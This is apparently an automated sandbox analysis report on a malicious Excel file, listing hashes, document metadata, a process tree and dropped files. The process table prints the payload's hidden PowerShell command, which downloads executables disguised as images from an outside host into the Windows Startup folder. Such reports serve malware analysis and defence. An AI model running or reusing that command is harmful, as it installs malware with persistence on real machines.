| Field | Value |
|---|---|
| File name | 2a28851adbc88c3335c6378c1f02df7f92b6912bbba8515186de194cb284993a |
| Full analysis | https://app.any.run/tasks/bd45e913-5c8d-4a67-81c3-818071996490 |
| Verdict | Malicious activity |
| Analysis date | March 22, 2019, 07:30:07 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
| File info | Microsoft Excel 2007+ |
| MD5 | 6BA7890D1FD39FD3BDE3F5E29DF62AAC |
| SHA1 | 6A57118CF2E07AB50D76D3BEAA114E96EC9B7941 |
| SHA256 | 2A28851ADBC88C3335C6378C1F02DF7F92B6912BBBA8515186DE194CB284993A |
| SSDEEP | 384:ohtJe3e9nJasT/UlM9z55u0S19SNL3N+lbIEmEDq/iuv9OrDnWa4t:yJbJjxtMDDyLklbIEPeausvWDt |
| Extension | File type identification (score) |
|---|---|
| .xlsx | Excel Microsoft Office Open XML Format document (61.2) |
| .zip | Open Packaging Conventions container (31.5) |
| .zip | ZIP compressed archive (7.2) |
| Document property | Value |
|---|---|
| AppVersion | 16.03 |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| Company | - |
| TitlesOfParts | Sheet1 |
| HeadingPairs | |
| ScaleCrop | No |
| DocSecurity | None |
| Application | Microsoft Excel |
| ModifyDate | 2019:03:14 16:43:56Z |
| CreateDate | 2018:11:03 15:16:32Z |
| LastModifiedBy | r |
| ZIP entry property | Value |
|---|---|
| ZipFileName | [Content_Types].xml |
| ZipUncompressedSize | 1675 |
| ZipCompressedSize | 431 |
| ZipCRC | 0x6560a6f0 |
| ZipModifyDate | 1980:01:01 00:00:00 |
| ZipCompression | Deflated |
| ZipBitFlag | 0x0006 |
| ZipRequiredVersion | 20 |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 916 | ``"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde`` | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
| 588 | ``"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\UniversalCrypto.zip"`` | C:\Program Files\WinRAR\WinRAR.exe | — | EXCEL.EXE |
| 816 | ``"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/servicesprint.png" -OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\servicesprint.lnk; -nop -w hidden [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/pcmon.png" -OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\pcmon.exe`` | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WinRAR.exe |

Process details:

- PID 916: User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000
- PID 588: User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0
- PID 816: User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 916 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR9D6F.tmp.cvr | — | — | — |
| 816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6H8SD38YZYRYXG8QGWY.temp | — | — | — |
| 816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5f3d8aaae8f69194.customDestinations-ms | binary | 965C12EFBF1820E4B3E1873BB7B0DB28 | 37B2144041DF8904A5E5D0AA9C7C58EF2FE9CBEDA3AC7334AC6E97E3121DA709 |
| 916 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\UniversalCrypto.zip | compressed | 03BCD9FC092ABA4675986BFF5F333310 | 318806A1E6B9E7A1243598EED36FA610E5ED437244ED6C259C0AFDE3DD23BD4F |
| 916 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A617F2DD.emf | emf | 71177D9512C0AD9D0B9B94388028ACC8 | B177E0281B98CD231B8E1525B8A7D99B42D24D839B7975877BF635EF94961E93 |
| 588 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa588.43933\UniversalCrypto-scanner.lnk | lnk | 6CD8352A312D3F58AE3DB17293825DC9 | 150B92C113DB1956CB1BA07F9D74B68017FDB4D3FFAE3869A6C8198699FECB7E |